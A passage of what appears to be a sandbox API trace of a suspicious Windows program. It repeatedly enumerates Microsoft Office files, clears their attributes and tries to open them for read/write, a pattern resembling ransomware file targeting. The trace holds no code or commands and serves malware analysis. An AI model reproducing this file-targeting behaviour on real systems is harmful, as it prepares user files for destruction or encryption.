lpFindFileData=0x29aca90) returned 1 [0136.239] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.240] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.240] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.240] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.240] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.241] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.241] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.241] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.241] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.241] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.241] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.245] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.245] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.245] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS", dwFileAttributes=0x80) returned 0 [0136.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.246] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.246] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.246] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.246] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.246] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.246] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.246] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.246] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.247] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.247] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.247] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.248] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.248] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.248] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.248] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.248] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.248] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.249] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.249] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.249] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.249] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.249] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONGuide.onepkg", dwFileAttributes=0x80) returned 0 [0136.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONGuide.onepkg" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onguide.onepkg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.249] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.249] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.249] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.249] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.249] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.249] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.249] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.250] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD", dwFileAttributes=0x80) returned 0 [0136.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgch.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.250] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.250] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.251] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.251] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.251] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL", dwFileAttributes=0x80) returned 0 [0136.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgchart.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.251] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.251] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.252] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.252] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD", dwFileAttributes=0x80) returned 0 [0136.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgpos.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.252] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.252] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.252] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.252] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL", dwFileAttributes=0x80) returned 0 [0136.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgwiz.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.253] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.253] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.253] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.253] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.253] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTFORM.DAT", dwFileAttributes=0x80) returned 0 [0136.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTFORM.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outform.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.254] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.254] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.254] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.254] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.254] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF", dwFileAttributes=0x80) returned 0 [0136.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlbar.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.254] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.254] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.254] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.254] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.255] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.255] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.255] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.255] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS", dwFileAttributes=0x80) returned 0 [0136.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.255] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.255] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.255] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.255] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.255] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.256] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.256] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.256] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.256] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.256] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.256] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.256] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.256] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.256] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.257] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.257] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.257] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.257] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.257] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.257] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.257] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.257] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL", dwFileAttributes=0x80) returned 0 [0136.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hol"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.258] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.258] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.258] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.258] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS", dwFileAttributes=0x80) returned 0 [0136.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.258] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.259] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.259] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.259] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.259] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.259] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.259] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.259] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.260] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.260] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.260] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.260] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.260] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.260] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.260] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.260] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.261] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.261] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.261] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.264] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.264] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLPERF.H", dwFileAttributes=0x80) returned 0 [0136.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLPERF.H" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlperf.h"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.264] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.264] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.265] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.265] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.265] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.265] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.265] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PASSPORT.CSS", dwFileAttributes=0x80) returned 0 [0136.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PASSPORT.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\passport.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.265] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.265] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.265] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.265] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PASTEL.CSS", dwFileAttributes=0x80) returned 0 [0136.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PASTEL.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pastel.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.266] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.266] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.266] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.266] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL", dwFileAttributes=0x80) returned 0 [0136.267] CreateFileW 